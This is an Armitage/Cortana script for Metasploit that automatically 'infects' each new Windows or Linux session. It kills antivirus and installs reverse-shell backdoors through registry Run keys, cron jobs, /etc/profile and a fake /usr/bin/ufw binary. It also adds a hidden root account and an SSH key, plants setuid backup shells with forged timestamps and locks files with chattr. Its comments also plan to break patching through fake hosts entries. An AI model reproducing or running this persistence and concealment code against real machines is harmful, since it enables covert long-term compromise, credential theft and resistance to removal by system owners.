# Script to install/hide a few shells/accounts# To Do# Add dns server# Upd

1. # Script to install/hide a few shells/accounts
2. # To Do
3. # Add dns server
4. # Update hosts file with fake entries to break patching (evil grade?)
5. # Author: __int128
6. global('%infected');
7. $win_user = 'lls_USER';
8. $win_pass = '@pplesauc3';
9. $local_ip = lhost();
10.  
11. on session_open {
12. $rhost = session_host($1);
13. if (%infected[session_host($1)] != "1") {
14. if (host_os(session_host($1)) eq "Microsoft Windows") {
15. if(-isshell $1) {
16. cmd_async("sessions -u $1");
17. }
18. if(-iswinmeterpreter $1) {
19. say("Infecting " . session_host($1));
20. m_cmd($1, "getsystem");
21. m_cmd($1, "run killav");
22. m_cmd($1, "run metsvc");
23. handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));
24.  
25. $r_lport = random_port();
26. # Generate Payload(s)
27. $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . ".exe";
28. $win_backdoor = generate("windows/meterpreter/reverse_tcp_allports", lhost(), $r_lport, %(), "exe");
29. $handle = openf(">/tmp/$r_backdoor");
30. writeb($handle, $win_backdoor);
31. closef($handle);
32. handler("windows/meterpreter/reverse_tcp_allports", $r_lport, %(ExitOnSession => "false", LHOST => lhost()));
33.  
34. $r_lport = random_port();
35. $win2_backdoor = generate("windows/meterpreter/reverse_tcp_allports", lhost(), $r_lport, %(), "dll");
36. $handle = openf(">/tmp/linkinfo.dll");
37. writeb($handle, $win2_backdoor);
38. closef($handle);
39. handler("windows/meterpreter/reverse_tcp_allports", $r_lport, %(ExitOnSession => "false", LHOST => lhost()));
40. m_cd($1, 'c:\Windows\System32');
41. m_upload($1, "/tmp/$r_backdoor)");
42. m_cd($1, 'c:\Windows');
43. m_upload($1, "/tmp/linkinfo.dll");
44. m_cmd($1, "reg setval -k HKLM\\\\software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run -v update -d \"c:\\\\Windows\\\\System32\\\\update.exe\"");
45.  
46. $r_lport = random_port();
47. m_cmd($1, "run persistence -X -i 60 -p $r_lport -r $local_ip");
48. handler("windows/meterpreter/reverse_tcp", $r_lport, %(ExitOnSession => "false", LHOST => lhost()));
49.  
50. m_cmd($1, "run getgui -u $backdoor_user -p $backdoor_pass");
51. m_cmd($1, "run gettelnet -u $backdoor_user -p $backdoor_pass");
52. $rdp = "creds --add " . session_host($1) . " -p 3389 -u $win_user -P $win_pass";
53. cmd_async($rdp);
54. $tel = "creds --add " . session_host($1) . " -p 23 -u $win_user -P $win_pass";
55. cmd_async($tel);
56.  
57. %infected[session_host($1)] = "1";
58. m_cmd($1, "run hashdump");
59. }
60. }
61. else if (host_os(session_host($1)) eq "Linux") {
62. if (-isshell $1) {
63. say("Infecting " . session_host($1));
64. s_cmd($1, "mkdir /root/.ssh");
65. # on load prompt for keys or generate?
66. $handle = openf("/opt/metasploit/msf3/data/armitage/id_dsa.pub");
67. $pub_key = readln($handle);
68. s_cmd($1, "echo $pub_key >> /root/.ssh/authorized_keys");
69. closef($handle);
70. s_cmd($1, "echo 'administrator:\$6\$W6D9sKYe\$tPihBsmoYXNNBfDhmkT30tYqMdCtMN.zn9HpczbzVd0YMw9P5dAQnjQ4KqUN/4IG5xs4t1SUZP5k82vi5UWGc0:15578:0:99999:7:::' >> /etc/shadow"); # pass = abc123
71. s_cmd($1, "echo 'administrator:x:0:0:nobody,,,,:/:/bin/bash' >>/etc/passwd");
72. $ssh = "creds --add " . session_host($1) . " -p 22 -u administrator -P abc123";
73. cmd_async($ssh);
74.  
75. # Generate Payload
76. $r_lport = random_port();
77. $r_backdoor = rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet) . rand(@alphabet);
78. $backdoor = generate("linux/x86/meterpreter/reverse_tcp", lhost(), $r_lport, %(), "elf");
79. $handle2 = openf(">/tmp/$r_backdoor");
80. writeb($handle2, $backdoor);
81. closef($handle2);
82.  
83. # set cron job
84. s_cmd($1, "mkdir /etc/cron.5min");
85. s_cmd($1, "echo '*/5 * * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.5min )' >> /etc/crontab");
86. s_cmd($1, "echo '*/5 * * * * /etc/cron.5min/dpkg' >> /var/spool/cron/crontabs/root");
87. s_cmd($1, "chmod 0600 /etc/crontab /etc/cron.5min /var/spool/cron/crontabs/root");
88. shell_upload($1, "/tmp/$r_backdoor", "/etc/cron.5min/dpkg");
89. s_cmd($1, "chmod 755 /etc/cron.5min/dpkg")
90. s_cmd($1, "chattr +i /etc/cron.5min/dpkg");
91.  
92. # set profile
93. shell_upload($1, "/tmp/$r_backdoor", "/usr/bin/ufw");
94. s_cmd($1, "chmod 775 /usr/bin/ufw");
95. s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/profile");
96. s_cmd($1, "echo '/usr/bin/ufw &' >>/etc/skel/.profile");
97. s_cmd($1, "chattr +i /usr/bin/ufw /etc/profile /etc/skel/.profile");
98.  
99. # Create Backup Shell
100. s_cmd($1, "cp /bin/zsh /.kernel; chmod +sss /.kernel; touch -d '4 May 2004' /.kernel; chattr +i /.kernel");
101. s_cmd($1, "cp /bin/tcsh /tmp/X11.auth; chmod +sss /tmp/X11.auth; touch -d '4 May 2004' /tmp/X11.auth");
102.  
103. %infected[session_host($1)] = "1";
104.  
105. # Launch our aux shells
106. handler("linux/x86/meterpreter/reverse_tcp", $r_lport, %(ExitOnSession => "false", LHOST => lhost()));
107. auxiliary("scanner/ssh/ssh_login_pubkey", @($rhost), %(USERNAME => 'root', KEY_FILE => '/opt/metasploit/msf3/data/armitage/id_dsa'));
108. login("scanner/ssh/ssh_login", @($rhost), "administrator", "abc123", %(LHOST => lhost(), LPORT => random_port()));
109.  
110. # Get hashes
111. launch("post", "linux/gather/hashdump", %(SESSION => "$1"));
112. db_sync();
113. }
114. }
115. else {
116. say("Failed to infect " . session_host($1) . ":" . host_os(session_host($1)));
117. }
118. }
119. }
120.  
121. popup host_bottom {
122. $rhost = $1;
123. if (%infected[$1] == "1") {
124. item "Re-establish connection" {
125. if (host_os($1) eq "Microsoft Windows") {
126. handler("windows/metsvc_bind_tcp", "31337", %(LHOST => lhost(), RHOST => $rhost));
127. }
128. if (host_os($1) eq "Linux") {
129. foreach $entry (credentials()) {
130. %cred = $entry;
131. if(%cred["ptype"] iswm "*password*") {
132. login("scanner/ssh/ssh_login", $rhost, %cred["user"], %cred["pass"], %(LHOST => lhost(), LPORT => random_port()));
133. }
134. }
135. }
136. }
137. }
138. }